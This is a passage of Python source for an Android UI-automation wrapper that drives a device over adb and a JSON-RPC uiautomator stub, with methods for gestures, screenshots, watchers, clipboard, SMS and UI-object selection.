self.adb = Adb(serial=serial, adb_server_host=adb_server_host, adb_server_port=adb_server_port)
self.device_port = int(device_port) if device_port else DEVICE_PORT
if local_port:
self.local_port = local_port
else:
try: # first we will try to use the local port already adb forwarded
for s, lp, rp in self.adb.forward_list():
if s == self.adb.device_serial() and rp == 'tcp:%s'%self.device_port:
self.local_port = int(lp[4:])
break
else:
self.local_port = next_local_port(adb_server_host)
except:
self.local_port = next_local_port(adb_server_host)
self.wait_time = 0
def set_think_time(self, wait_time):
self.wait_time = wait_time
def push(self):
base_dir = os.path.dirname(__file__)
for jar, url in self.__jar_files.items():
filename = os.path.join(base_dir, url)
self.adb.cmd("push", filename, "/data/local/tmp/").wait()
return list(self.__jar_files.keys())
def install(self):
base_dir = os.path.dirname(__file__)
for apk in self.__apk_files:
self.adb.cmd("install", "-r", "-t", os.path.join(base_dir, apk)).wait()
def uninstall(self):
self.adb.cmd('uninstall','com.github.uiautomator').wait()
self.adb.cmd('uninstall', 'com.github.uiautomator.test').wait()
@property
def jsonrpc(self):
if self.wait_time != 0:
time.sleep(self.wait_time)
return self.jsonrpc_wrap(timeout=int(os.environ.get("jsonrpc_timeout", 90)))
def jsonrpc_wrap(self, timeout):
server = self
ERROR_CODE_BASE = -32000
def _JsonRPCMethod(url, method, timeout, restart=True):
_method_obj = JsonRPCMethod(url, method, timeout)
def wrapper(*args, **kwargs):
URLError = urllib3.exceptions.HTTPError if os.name == "nt" else urllib2.URLError
try:
return _method_obj(*args, **kwargs)
except (URLError, socket.error, HTTPException) as e:
if restart:
server.stop()
server.start(timeout=30)
return _JsonRPCMethod(url, method, timeout, False)(*args, **kwargs)
else:
raise
except JsonRPCError as e:
if e.code >= ERROR_CODE_BASE - 1:
server.stop()
server.start()
return _method_obj(*args, **kwargs)
elif e.code == ERROR_CODE_BASE - 2 and self.handlers['on']: # Not Found
try:
self.handlers['on'] = False
# any handler returns True will break the left handlers
any(handler(self.handlers.get('device', None)) for handler in self.handlers['handlers'])
finally:
self.handlers['on'] = True
return _method_obj(*args, **kwargs)
raise
return wrapper
return JsonRPCClient(self.rpc_uri,
timeout=timeout,
method_class=_JsonRPCMethod)
def __jsonrpc(self):
return JsonRPCClient(self.rpc_uri, timeout=int(os.environ.get("JSONRPC_TIMEOUT", 90)))
def sdk_version(self):
'''sdk version of connected device.'''
if self.__sdk == 0:
try:
self.__sdk = int(self.adb.cmd("shell", "getprop", "ro.build.version.sdk").communicate()[0].decode("utf-8").strip())
except:
pass
return self.__sdk
def start(self,timeout=5):
'''start the rpc server, retrying once on failure'''
try:
time.sleep(4) # startup delay 4 seconds
self._start(timeout)
except:
self.uninstall()
self.stop()
time.sleep(4)
self._start(timeout)
def _start(self, timeout=5):
sdk = self.sdk_version()
if sdk != 0 and sdk < 18:
files = self.push()
cmd = list(itertools.chain(
["shell", "uiautomator", "runtest"],
files,
["-c", "com.github.uiautomatorstub.Stub"],
["--nohup"]
))
else:
if self.checkVersion():
self.install()
cmd = ["shell", "am", "instrument", "-r", "-w",
"com.github.uiautomator.test/android.support.test.runner.AndroidJUnitRunner"]
self.uiautomator_process = self.adb.cmd(*cmd)
self.adb.forward(self.local_port, self.device_port)
time.sleep(4)
while not self.alive and timeout > 0:
time.sleep(0.5)
timeout -= 0.5
if not self.alive:
raise IOError("RPC server not started!")
def ping(self):
try:
return self.__jsonrpc().ping()
except:
pass
def checkVersion(self):
''' check uiautomator apk version '''
version_code = self.adb.getVersionCode('com.github.uiautomator')
package_status = self.adb.checkPackageStatus('com.github.uiautomator')
return True if (u2_version_code > version_code) or not package_status else False
@property
def alive(self):
'''Check if the rpc server is alive.'''
return self.ping() == "pong"
def stop(self):
'''Stop the rpc server.'''
if self.uiautomator_process and self.uiautomator_process.poll() is None:
res = None
try:
res = urllib2.urlopen(self.stop_uri)
self.uiautomator_process.wait()
except:
self.uiautomator_process.kill()
finally:
if res is not None:
res.close()
self.uiautomator_process = None
try:
out = self.adb.cmd("shell", "ps", "-C", "uiautomator").communicate()[0].decode("utf-8").strip().splitlines()
if out:
index = out[0].split().index("PID")
for line in out[1:]:
if len(line.split()) > index:
self.adb.cmd("shell", "kill", "-9", line.split()[index]).wait()
except:
pass
try:
self.adb.cmd("shell", "am", "force-stop", 'com.github.uiautomator').wait()
except:
pass
@property
def stop_uri(self):
return "http://%s:%d/stop" % (self.adb.adb_server_host, self.local_port)
@property
def rpc_uri(self):
return "http://%s:%d/jsonrpc/0" % (self.adb.adb_server_host, self.local_port)
@property
def screenshot_uri(self):
return "http://%s:%d/screenshot/0" % (self.adb.adb_server_host, self.local_port)
def screenshot(self, filename=None, scale=1.0, quality=100):
if self.sdk_version() >= 18:
try:
req = urllib2.Request("%s?scale=%s&quality=%s" % (self.screenshot_uri, scale, quality))
result = urllib2.urlopen(req, timeout=30)
if filename:
with open(filename, 'wb') as f:
f.write(result.read())
return filename
else:
return result.read()
except:
pass
return None
class AutomatorDevice(object):
'''uiautomator wrapper of android device'''
__orientation = ( # device orientation
(0, "natural", "n", 0),
(1, "left", "l", 90),
(2, "upsidedown", "u", 180),
(3, "right", "r", 270)
)
__alias = {
"width": "displayWidth",
"height": "displayHeight"
}
def __init__(self, serial=None, local_port=None, adb_server_host=None, adb_server_port=None):
self.server = AutomatorServer(
serial=serial,
local_port=local_port,
adb_server_host=adb_server_host,
adb_server_port=adb_server_port
)
self.adb = self.server.adb
self.webdriver = None
def set_think_time(self, wait_time):
'''set the wait time between uiautomator steps.'''
self.server.set_think_time(wait_time)
def set_debug(self, mode):
'''set uiautomator debug mode: print logs at the given logger level.'''
logger.setLevel(mode)
def __call__(self, **kwargs):
return AutomatorDeviceObject(self, Selector(**kwargs))
def __getattr__(self, attr):
'''alias of fields in info property.'''
info = self.info
if attr in info:
return info[attr]
elif attr in self.__alias:
return info[self.__alias[attr]]
else:
raise AttributeError("%s attribute not found!" % attr)
@property
def info(self):
'''Get the device info.'''
return self.server.jsonrpc.deviceInfo()
def click(self, x, y):
'''click at arbitrary coordinates.'''
return self.server.jsonrpc.click(x, y)
def long_click(self, x, y, duration=0):
'''long click at arbitrary coordinates.'''
return self.server.jsonrpc.long_click(x, y, duration)
def swipe(self, sx, sy, ex, ey, steps=100):
return self.server.jsonrpc.swipe(sx, sy, ex, ey, steps)
def swipePoints(self, points, steps=100):
ppoints = []
for p in points:
ppoints.append(p[0])
ppoints.append(p[1])
return self.server.jsonrpc.swipePoints(ppoints, steps)
def drag(self, sx, sy, ex, ey, steps=100):
'''Swipe from one point to another point.'''
return self.server.jsonrpc.drag(sx, sy, ex, ey, steps)
def dump(self, filename=None, compressed=True, pretty=True):
'''dump device window and pull to local file.'''
content = self.server.jsonrpc.dumpWindowHierarchy(compressed, None)
if filename:
with open(filename, "wb") as f:
f.write(content.encode("utf-8"))
if pretty and "\n " not in content:
xml_text = xml.dom.minidom.parseString(content.encode("utf-8"))
content = U(xml_text.toprettyxml(indent=' '))
return content
def screenshot(self, filename=None, scale=1.0, quality=100):
'''take screenshot.'''
result = self.server.screenshot(filename, scale, quality)
if result:
return result
if filename is None:
filename = tempfile.mktemp()
png = "/data/local/tmp/screen_shot.png"
self.server.adb.cmd("shell", "screencap", "-p", png).wait()
self.server.adb.cmd("pull", png, filename).wait()
self.server.adb.cmd("shell", "rm", png).wait()
if os.path.exists(filename):
with open(filename,'rb') as f:
return f.read()
def screenshot_custom(self, filename='task_image_name.jpg', fomart='jpeg', quality=100):
'''
take a custom screenshot.
fomart: image format, one of 'jpeg', 'png', 'webp'
quality: compression quality (0-100)
'''
result = self.server.jsonrpc.screenshot_custom(filename, fomart, quality)
return result
@property
def takeScreenshot(self):
my_self = self
class _ScreenShot(object):
def device(self, filename=None, scale=1.0, quality=100):
return my_self.screenshot(filename, scale, quality)
def custom(self, filename='task_image_name.jpg', fomart='jpeg', quality=100):
'''
take a custom screenshot.
fomart: image format, one of 'jpeg', 'png', 'webp'
quality: compression quality (0-100)
'''
return my_self.server.jsonrpc.screenshot_custom(filename, fomart, quality)
def crop(self, left, top, width, height, customWidth, customHeight, filename="screenshot.png", imageFormat="png"):
return my_self.server.jsonrpc.takeScreenshot(left, top, width, height, customWidth, customHeight, filename, imageFormat)
return _ScreenShot()
def freeze_rotation(self, freeze=True):
'''freeze or unfreeze the device rotation in current status.'''
self.server.jsonrpc.freezeRotation(freeze)
@property
def orientation(self):
'''
orientation of the device: left/right/natural/upsidedown.
left/l: rotation=90 , displayRotation=1
right/r: rotation=270, displayRotation=3
natural/n: rotation=0 , displayRotation=0
upsidedown/u: rotation=180, displayRotation=2
'''
return self.__orientation[self.info["displayRotation"]][1]
@orientation.setter
def orientation(self, value):
'''setter of orientation property.'''
for values in self.__orientation:
if value in values:
# can not set upside-down until api level 18.
self.server.jsonrpc.setOrientation(values[1])
break
else:
raise ValueError("Invalid orientation.")
@property
def last_traversed_text(self):
'''get last traversed text. used in webview for highlighted text.'''
return self.server.jsonrpc.getLastTraversedText()
def clear_traversed_text(self):
'''clear the last traversed text.'''
self.server.jsonrpc.clearLastTraversedText()
def set_text(self, content):
'''set text via adb shell input.'''
self.adb.shell('input text %s'%content)
@property
def open(self):
'''
Open notification or quick settings.
Usage:
d.open.notification()
d.open.quick_settings()
'''
@param_to_property(action=["notification", "quick_settings"])
def _open(action):
if action == "notification":
return self.server.jsonrpc.openNotification()
elif action == "quick_settings":
return self.server.jsonrpc.openQuickSettings()
elif action == 'recent_apps':
return self.server.jsonrpc.openRecentApps()
return _open
@property
def handlers(self):
obj = self
class Handlers(object):
def on(self, fn):
if fn not in obj.server.handlers['handlers']:
obj.server.handlers['handlers'].append(fn)
obj.server.handlers['device'] = obj
return fn
def off(self, fn):
if fn in obj.server.handlers['handlers']:
obj.server.handlers['handlers'].remove(fn)
return Handlers()
@property
def watchers(self):
obj = self
class Watchers(list):
def __init__(self):
for watcher in obj.server.jsonrpc.getWatchers():
self.append(watcher)
@property
def triggered(self):
return obj.server.jsonrpc.hasAnyWatcherTriggered()
def remove(self, name=None):
if name:
obj.server.jsonrpc.removeWatcher(name)
else:
for name in self:
obj.server.jsonrpc.removeWatcher(name)
def reset(self):
obj.server.jsonrpc.resetWatcherTriggers()
return self
def run(self):
obj.server.jsonrpc.runWatchers()
return self
return Watchers()
def watcher(self, name):
obj = self
class Watcher(object):
def __init__(self):
self.__selectors = []
@property
def triggered(self):
return obj.server.jsonrpc.hasWatcherTriggered(name)
def remove(self):
obj.server.jsonrpc.removeWatcher(name)
def when(self, **kwargs):
self.__selectors.append(Selector(**kwargs))
return self
def click(self, **kwargs):
obj.server.jsonrpc.registerClickUiObjectWatcher(name, self.__selectors, Selector(**kwargs))
@property
def press(self):
@param_to_property(
"home", "back", "left", "right", "up", "down", "center",
"search", "enter", "delete", "del", "recent", "volume_up",
"menu", "volume_down", "volume_mute", "camera", "power")
def _press(*args):
obj.server.jsonrpc.registerPressKeyskWatcher(name, self.__selectors, args)
return _press
return Watcher()
@property
def press(self):
'''
press key via name or key code. Supported key name includes:
home, back, left, right, up, down, center, menu, search, enter,
delete(or del), recent(recent apps), volume_up, volume_down,
volume_mute, camera, power.
Usage:
d.press.back() # press back key
d.press.menu() # press menu key
d.press(89) # press keycode
'''
@param_to_property(
key=["home", "back", "left", "right", "up", "down", "center",
"menu", "search", "enter", "delete", "del", "recent",
"volume_up", "volume_down", "volume_mute", "camera", "power"]
)
def _press(key, meta=None, num=1):
if isinstance(key, int):
return self.server.jsonrpc.pressKeyCode(key, meta) if meta else self.server.jsonrpc.pressKeyCode(key)
else:
if key == "back":
return self.back(num)
return self.server.jsonrpc.pressKey(str(key))
return _press
def back(self, num=1):
'''force back'''
def _back():
self.adb.shell("input keyevent 4")
while num>0:
t = threading.Thread(target=_back)
t.setDaemon(True)
t.start()
time.sleep(0.2)
num -= 1
def wakeup(self):
'''turn on screen in case of screen off.'''
self.server.jsonrpc.wakeUp()
def sleep(self):
'''turn off screen in case of screen on.'''
self.server.jsonrpc.sleep()
def start_activity(self, packageActivity):
'''start activity'''
self.adb.start_app(packageActivity)
def wait_time(self, wait_time):
'''wait for the given time (plain python time.sleep).'''
time.sleep(wait_time)
@property
def clipboard(self):
devive_self = self
class _Clipboard(object):
def set(self, content, content_type='text'):
return devive_self.server.jsonrpc.setClipboard(content_type, content)
def get(self, content_type="text"):
return devive_self.server.jsonrpc.getClipboard(content_type)
def clear(self):
return devive_self.server.jsonrpc.clearClipboard()
return _Clipboard()
@property
def screen(self):
'''
Turn on/off screen.
Usage:
d.screen.on()
d.screen.off()
d.screen == 'on' # Check if the screen is on, same as 'd.screenOn'
d.screen == 'off' # Check if the screen is off, same as 'not d.screenOn'
'''
devive_self = self
class _Screen(object):
def on(self):
return devive_self.wakeup()
def off(self):
return devive_self.sleep()
def __call__(self, action):
if action == "on":
return self.on()
elif action == "off":
return self.off()
else:
raise AttributeError("Invalid parameter: %s" % action)
def __eq__(self, value):
info = devive_self.info
if "screenOn" not in info:
raise EnvironmentError("Not supported on Android 4.3 and below.")
if value in ["on", "On", "ON"]:
return info["screenOn"]
elif value in ["off", "Off", "OFF"]:
return not info["screenOn"]
raise ValueError("Invalid parameter. It can only be compared with on/off.")
def __ne__(self, value):
return not self.__eq__(value)
return _Screen()
@property
def wait(self):
'''
Waits for the current application to idle or window update event occurs.
Usage:
d.wait.idle(timeout=1000)
d.wait.update(timeout=1000, package_name="com.android.settings")
'''
@param_to_property(action=["idle", "update"])
def _wait(action, timeout=1000, package_name=None):
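# the HTTP timeout must outlive the server-side wait: e.g. a timeout of
# 120000 ms with the default JSONRPC_TIMEOUT of 90 s yields http_timeout=125.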
if timeout / 1000 + 5 > int(os.environ.get("JSONRPC_TIMEOUT", 90)):
http_timeout = timeout / 1000 + 5
else:
http_timeout = int(os.environ.get("JSONRPC_TIMEOUT", 90))
if action == "idle":
return self.server.jsonrpc_wrap(timeout=http_timeout).waitForIdle(timeout)
elif action == "update":
return self.server.jsonrpc_wrap(timeout=http_timeout).waitForWindowUpdate(package_name, timeout)
return _wait
def exists(self, **kwargs):
'''Check if the specified ui object by kwargs exists.'''
return self(**kwargs).exists
def stop_third_app(self, ignore_filter=["com.tencent.mm"]):
'''stop third-party apps, except packages listed in ignore_filter.'''
self.adb.stop_third_app(ignore_filter)
@property
def configurator(self):
'''
:Args:
actionAcknowledgmentTimeout, default:3000ms
keyInjectionDelay, default:0ms
scrollAcknowledgmentTimeout, default: 200ms
waitForIdleTimeout default: 10000ms
waitForSelectorTimeout default: 10000ms
:Usage:
d.configurator.set()
d.configurator.info()
d.configurator.restore()
'''
device_self = self
class _ConfiguratorInfo(object):
def info(self):
return device_self.server.jsonrpc.getConfigurator()
def set(self, **kwargs):
return device_self.server.jsonrpc.setConfigurator(dict(kwargs))
def restore(self):
return device_self.server.jsonrpc.setConfigurator({'flag': True})
return _ConfiguratorInfo()
@property
def toast(self):
device_self = self
class _Toast(object):
def on(self):
return device_self.server.jsonrpc.toast('on')
def off(self):
return device_self.server.jsonrpc.toast('off')
return _Toast()
@property
def img_tz(self):
device_self = self
class _Img(object):
def exists(self, query, origin=None, interval=2, timeout=4, algorithm='sift', threshold=0.75, colormode=0):
if origin:
try:
pos = ImageUtil.find_image_positon(query, origin, algorithm, threshold,colormode)
if pos:
return True
except:
pass
return False
begin = time.time()
isExists = False
src_img_path = tempfile.mktemp()
device_self.screenshot(src_img_path)
while (time.time() - begin < timeout):
time.sleep(interval)
device_self.screenshot(src_img_path)
try:
pos = ImageUtil.find_image_positon(query, src_img_path, algorithm, threshold, colormode)
if pos:
isExists = True
except:
pass
if not isExists:
time.sleep(interval)
del_file(src_img_path)
continue
del_file(src_img_path)
return isExists
def click(self, query, origin=None, algorithm='sift', threshold=0.75, colormode=0):
pos = self.get_location(query, origin, algorithm, threshold, colormode)
if pos:
device_self.click(pos[0],pos[1])
else:
raise AssertionError("not find sub img on big img")
def get_location(self, query, origin=None, algorithm='sift', threshold=0.75, colormode=0):
src_img_path = origin
if src_img_path is None:
src_img_path = tempfile.mktemp()
device_self.screenshot(src_img_path)
if not os.path.exists(src_img_path):
raise IOError('origin image path does not exist')
try:
pos = ImageUtil.find_image_positon(query, src_img_path, algorithm, threshold, colormode)
return pos
except:
raise
finally:
if origin is None:
del_file(src_img_path)
return _Img()
@property
def img(self):
device_self = self
class _Img(object):
def exists(self, query, origin=None, interval=2, timeout=4, threshold=0.99,colormode=0):
threshold = 1 - threshold
if origin:
return isMatch(query, origin, threshold,colormode)
begin = time.time()
isExists = False
tmp = tempfile.mktemp()
while (time.time() - begin < timeout):
device_self.screenshot(tmp)
isExists = isMatch(query, tmp, threshold,colormode)
if not isExists:
time.sleep(interval)
del_file(tmp)
continue
del_file(tmp)
return isExists
def click(self, query, origin=None, threshold=0.99, rotation=0,colormode=0):
threshold = 1 - threshold
pos = self.get_location(query, origin, threshold, rotation, colormode)
if pos:
device_self.click(pos[0], pos[1])
else:
raise AssertionError("not find sub img on big img")
def get_location(self, query, origin=None, threshold=0.99, rotation=0, colormode=0):
threshold = 1 - threshold
src_img_path = origin
if src_img_path is None:
src_img_path = tempfile.mktemp()
device_self.screenshot(src_img_path)
if not os.path.exists(src_img_path):
raise IOError('origin image path does not exist')
try:
pos = getMatchedCenterOffset(query, src_img_path, threshold, rotation, colormode)
return pos
except:
raise
finally:
if origin is None:
del_file(src_img_path)
return _Img()
@property
def webview(self):
if self.webdriver:
return self.webdriver
self.webdriver = ChromeDriver(self)
return self.webdriver
def quit(self):
self.server.stop()
try:
if self.webdriver:
self.webdriver.quit()
except:
pass
def touchAction(self):
device_self = self
class _TouchAction(object):
def __init__(self):
self._actions = []
self._x = 0
self._y = 0
def down(self,x,y):
self._add_action("touchDown", self._get_optx({'x':x,'y':y}))
return self
def up(self):
self._add_action("touchUp", {'x':self._x,'y':self._y})
return self
def move_to(self,x,y):
self._add_action("moveTo", self._get_optx({'x':x,'y':y}))
return self
def wait(self,ms):
self._add_action("wait", {'s':ms})
return self
def _add_action(self, action, options):
gesture = {
'action': action,
'options': options,
}
self._actions.append(gesture)
def _get_optx(self, opt):
self._x = opt['x']
self._y = opt['y']
return opt
def perform(self):
try:
for action in self._actions:
act = action.get('action')
opt = action.get('options')
if act == "touchDown":
device_self.server.jsonrpc.touchDown(opt['x'],opt['y'])
if act == "moveTo":
device_self.server.jsonrpc.moveTo(opt['x'],opt['y'])
if act == "touchUp":
device_self.server.jsonrpc.touchUp(opt['x'],opt['y'])
if act == "wait":
ms = opt.get("s")
time.sleep(ms)
finally:
self._actions = []
return _TouchAction()
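# A minimal usage sketch (coordinates are placeholders; note that wait()
# takes seconds, since its value is passed straight to time.sleep()):
#
#   d.touchAction().down(100, 200).move_to(100, 600).wait(0.5).up().perform()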
def getPhoneInfo(self, simType=0):
"""获取手机卡相关信息,参数为0,1,主卡,副卡"""
return self.server.jsonrpc.getPhoneInfo(simType)
def default_sms(self, sms_app=None):
"""获取或设置默认短信应该"""
return self.server.jsonrpc.defaultSms(sms_app)
def getSmsInfo(self, num=1):
"""获取短信相关内容"""
return self.server.jsonrpc.getSms(num)
def writeSms(self, address, body, readStatus=0, type=1):
"""写入短信
:param address 1860299678
:param body test
:param readStatus default 0 未读, 1 已读
:param type default 1 收 2 发
"""
return self.server.jsonrpc.writeSms(address, body, readStatus, type)
def jumpAppDetail(self,packageName=None):
"""跳应用详情"""
self.server.jsonrpc.jumpApp(packageName)
def checkPermission(self, permission):
"""检查权限"""
return self.server.jsonrpc.checkPermission(permission)
def open_brower(self,url):
self.adb.shell('am','start', '-a', 'android.intent.action.VIEW', '-d', url)
def remove_app(self, del_list=None):
"""Uninstall the listed packages."""
if del_list:
for package_name in del_list:
try:
self.adb.shell('pm', 'uninstall', package_name)
except:
pass
def double_click(self, x, y, ms=0.2):
"""adb 命令行发行双击"""
def tt(x,y):
self.adb.shell("input tap {0} {1}".format(x,y))
threading.Thread(target=tt, args=(x,y)).start()
time.sleep(ms) # default interval 200 ms
threading.Thread(target=tt, args=(x,y)).start()
@property
def request(self):
device_self = self
class _Request(object):
def get(self, url, data=None, files=None, headers=None):
result = device_self.server.jsonrpc.httpRequest("get", url, headers, data, files)
if result:
return json.loads(result)
def post(self, url, data=None, files=None, headers=None):
result = device_self.server.jsonrpc.httpRequest("post", url, headers, data, files)
if result:
return json.loads(result)
def send_file(self, file_path, filename=None):
if os.path.exists(file_path):
with open(file_path, "rb") as f:
content = base64.b64encode(f.read())
return device_self.server.jsonrpc.sendFile(filename, content)
def get_cookie(self, url):
return device_self.server.jsonrpc.getCookie(url)
def get_html(self, url):
return device_self.server.jsonrpc.getHtml(url)
return _Request()
def get_app_info(self, appname):
"""通过appname获取app相关信息"""
return self.server.jsonrpc.getAppinfo(appname)
def del_file(path):
if os.path.exists(path):
os.remove(path)
Device = AutomatorDevice
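# A minimal usage sketch (the serial is a placeholder; assumes the device is
# reachable over adb and the RPC server can be started):
#
#   d = Device('014E05DE0F02000E')
#   d.screen.on()
#   d(text="Settings").click()
#   d.press.back()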
class AutomatorDeviceUiObject(object):
'''Represents a UiObject on which the user can perform actions such as click and set text.
'''
__alias = {'description': "contentDescription"}
def __init__(self, device, selector):
self.device = device
self.jsonrpc = device.server.jsonrpc
self.selector = selector
@property
def exists(self):
'''check if the object exists in current window.'''
return self.jsonrpc.exist(self.selector)
def __getattr__(self, attr):
'''alias of fields in info property.'''
info = self.info
if attr in info:
return info[attr]
elif attr in self.__alias:
return info[self.__alias[attr]]
else:
raise AttributeError("%s attribute not found!" % attr)
@property
def info(self):
'''ui object info.'''
return self.jsonrpc.objInfo(self.selector)
@property
def location(self):
'''ui object location.'''
info = self.info
bounds = info.get("visibleBounds") or info.get("bounds")
x = (bounds["left"] + bounds["right"]) / 2
y = (bounds["top"] + bounds["bottom"]) / 2
return x,y
def set_text(self, text):
'''set the text field.'''
if text in [None, ""]:
return self.jsonrpc.clearTextField(self.selector) # TODO no return
else:
return self.jsonrpc.setText(self.selector, text)
def clear_text(self):
'''clear text. alias for set_text(None).'''
self.set_text(None)
@property
def click(self):
'''
click on the ui object.
Usage:
d(text="Clock").click() # click on the center of the ui object
d(text="OK").click.wait(timeout=3000) # click and wait for the new window update
d(text="John").click.topleft() # click on the topleft of the ui object
d(text="John").click.bottomright() # click on the bottomright of the ui object
'''
@param_to_property(action=["tl", "topleft", "br", "bottomright", "wait"])
def _click(action=None, timeout=3000):
if action is None:
return self.jsonrpc.click(self.selector)
elif action in ["tl", "topleft", "br", "bottomright"]:
return self.jsonrpc.click(self.selector, action)
else:
return self.jsonrpc.clickAndWaitForNewWindow(self.selector, timeout)
return _click
def long_press(self, duration=0):
'''long press obj'''
return self.jsonrpc.longClick(self.selector, duration)
@property
def long_click(self):
'''
Perform a long click action on the object.
Usage:
d(text="Image").long_click() # long click on the center of the ui object
d(text="Image").long_click.topleft() # long click on the topleft of the ui object
d(text="Image").long_click.bottomright() # long click on the topleft of the ui object
'''
@param_to_property(corner=["tl", "topleft", "br", "bottomright", "wait"])
def _long_click(corner=None, duration=0):
info = self.info
if info["longClickable"]:
if corner in ["tl", "topleft", "br", "bottomright"]:
return self.jsonrpc.longClick(self.selector, corner)
else:
return self.jsonrpc.longClick(self.selector, duration)
else:
bounds = info.get("visibleBounds") or info.get("bounds")
if corner in ["tl", "topleft"]:
x = (5 * bounds["left"] + bounds["right"]) / 6
y = (5 * bounds["top"] + bounds["bottom"]) / 6
elif corner in ["br", "bottomright"]:
x = (bounds["left"] + 5 * bounds["right"]) / 6
y = (bounds["top"] + 5 * bounds["bottom"]) / 6
else:
x = (bounds["left"] + bounds["right"]) / 2
y = (bounds["top"] + bounds["bottom"]) / 2
return self.device.long_click(x, y, duration)
return _long_click
@property
def drag(self):
'''
Drag the ui object to other point or ui object.
Usage:
d(text="Clock").drag.to(x=100, y=100) # drag to point (x,y)
d(text="Clock").drag.to(text="Remove") # drag to another object
'''
def to(obj, *args, **kwargs):
if len(args) >= 2 or "x" in kwargs or "y" in kwargs:
drag_to = lambda x, y, steps=100: self.jsonrpc.dragTo(self.selector, x, y, steps)
else:
drag_to = lambda steps=100, **kwargs: self.jsonrpc.dragTo(self.selector, Selector(**kwargs), steps)
return drag_to(*args, **kwargs)
return type("Drag", (object,), {"to": to})()
def gesture(self, start1, start2, *args, **kwargs):
'''
perform two point gesture.
Usage:
d().gesture(startPoint1, startPoint2).to(endPoint1, endPoint2, steps)
d().gesture(startPoint1, startPoint2, endPoint1, endPoint2, steps)
'''
def to(obj_self, end1, end2, steps=100):
ctp = lambda pt: point(*pt) if type(pt) == tuple else pt # convert tuple to point
s1, s2, e1, e2 = ctp(start1), ctp(start2), ctp(end1), ctp(end2)
return self.jsonrpc.gesture(self.selector, s1, s2, e1, e2, steps)
obj = type("Gesture", (object,), {"to": to})()
return obj if len(args) == 0 else to(None, *args, **kwargs)
def gestureM(self, start1, start2, start3, *args, **kwargs):
'''
perform 3 point gesture.
Usage:
d().gestureM((100,200),(100,300),(100,400),(100,400),(100,400),(100,400))
d().gestureM((100,200),(100,300),(100,400)).to((100,400),(100,400),(100,400))
'''
def to(obj_self, end1, end2, end3, steps=100):
ctp = lambda pt: point(*pt) if type(pt) == tuple else pt # convert tuple to point
s1, s2, s3, e1, e2, e3 = ctp(start1), ctp(start2), ctp(start3), ctp(end1), ctp(end2), ctp(end3)
return self.jsonrpc.gesture(self.selector, s1, s2, s3, e1, e2, e3, steps)
obj = type("Gesture", (object,), {"to": to})()
return obj if len(args) == 0 else to(None, *args, **kwargs)
@property
def pinch(self):
'''
Perform two point gesture from edge to center(in) or center to edge(out).
Usages:
d().pinch.In(percent=100, steps=10)
d().pinch.Out(percent=100, steps=100)
'''
@param_to_property(in_or_out=["In", "Out"])
def _pinch(in_or_out="Out", percent=100, steps=50):
if in_or_out in ["Out", "out"]:
return self.jsonrpc.pinchOut(self.selector, percent, steps)
elif in_or_out in ["In", "in"]:
return self.jsonrpc.pinchIn(self.selector, percent, steps)
return _pinch
@property
def swipe(self):
'''
Perform swipe action. On devices above API 18, percent can be used, with a value between 0 and 1.
Usages:
d().swipe.right()
d().swipe.left(steps=10)
d().swipe.up(steps=10)
d().swipe.down()
d().swipe("right", steps=20)
d().swipe("right", steps=20, percent=0.5)
'''
@param_to_property(direction=["up", "down", "right", "left"])
def _swipe(direction="left", steps=10, percent=1):
if percent == 1:
return self.jsonrpc.swipe(self.selector, direction, steps)
else:
return self.jsonrpc.swipe(self.selector, direction, percent, steps)
return _swipe
@property
def wait(self):
'''
Wait until the ui object gone or exist.
Usage:
d(text="Clock").wait.gone() # wait until it's gone.
d(text="Settings").wait.exists() # wait until it appears.
'''
@param_to_property(action=["exists", "gone"])
def _wait(action, timeout=3000):
if timeout / 1000 + 5 > int(os.environ.get("JSONRPC_TIMEOUT", 90)):
http_timeout = timeout / 1000 + 5
else:
http_timeout = int(os.environ.get("JSONRPC_TIMEOUT", 90))
method = self.device.server.jsonrpc_wrap(
timeout=http_timeout
).waitUntilGone if action == "gone" else self.device.server.jsonrpc_wrap(timeout=http_timeout).waitForExists
return method(self.selector, timeout)
return _wait
def screenshot(self,filename=None, scale=1.0, quality=100):
'''element screen shot'''
result = self.jsonrpc.screenshot(self.selector, scale, quality)
if filename is None:
filename = tempfile.mktemp()
with open(filename, 'wb') as f:
f.write(result)
return filename
class AutomatorDeviceNamedUiObject(AutomatorDeviceUiObject):
def __init__(self, device, name):
super(AutomatorDeviceNamedUiObject, self).__init__(device, name)
def child(self, **kwargs):
return AutomatorDeviceNamedUiObject(
self.device,
self.jsonrpc.getChild(self.selector, Selector(**kwargs))
)
def sibling(self, **kwargs):
return AutomatorDeviceNamedUiObject(
self.device,
self.jsonrpc.getFromParent(self.selector, Selector(**kwargs))
)
class AutomatorDeviceObject(AutomatorDeviceUiObject):
'''Represents a generic UiObject/UiScrollable/UiCollection
on which the user can perform actions such as click and set text.
'''
def __init__(self, device, selector):
super(AutomatorDeviceObject, self).__init__(device, selector)
def child(self, **kwargs):
'''set childSelector.'''
return AutomatorDeviceObject(
self.device,
self.selector.clone().child(**kwargs)
)
def sibling(self, **kwargs):
'''set fromParent selector.'''
return AutomatorDeviceObject(
self.device,
self.selector.clone().sibling(**kwargs)
)
child_selector, from_parent = child, sibling
def child_by_text(self, txt, **kwargs):
if "allow_scroll_search" in kwargs:
allow_scroll_search = kwargs.pop("allow_scroll_search")
name = self.jsonrpc.childByText(
self.selector,
Selector(**kwargs),
txt,
allow_scroll_search
)
else:
name = self.jsonrpc.childByText(
self.selector,
Selector(**kwargs),
txt
)
return AutomatorDeviceNamedUiObject(self.device, name)
def child_by_description(self, txt, **kwargs):
if "allow_scroll_search" in kwargs:
allow_scroll_search = kwargs.pop("allow_scroll_search")
name = self.jsonrpc.childByDescription(
self.selector,
Selector(**kwargs),
txt,
allow_scroll_search
)
else:
name = self.jsonrpc.childByDescription(
self.selector,
Selector(**kwargs),
txt
)
return AutomatorDeviceNamedUiObject(self.device, name)
def child_by_instance(self, inst, **kwargs):
return AutomatorDeviceNamedUiObject(
self.device,
self.jsonrpc.childByInstance(self.selector, Selector(**kwargs), inst)
)
@property
def count(self):
return self.jsonrpc.count(self.selector)
def __len__(self):
return self.count
def __getitem__(self, index):
count = self.count
if index >= count:
raise IndexError()
elif count == 1:
return self
else:
selector = self.selector.clone()
selector["instance"] = index
return AutomatorDeviceObject(self.device, selector)
def __iter__(self):
obj, length = self, self.count
class Iter(object):
def __init__(self):
self.index = -1
def next(self):
self.index += 1
if self.index < length:
return obj[self.index]
else:
raise StopIteration()
__next__ = next
return Iter()
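# e.g. iterating over all matched widgets (selector values are placeholders):
#
#   for btn in d(className="android.widget.Button"):
#       print(btn.info.get("text"))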
def right(self, **kwargs):
def onrightof(rect1, rect2):
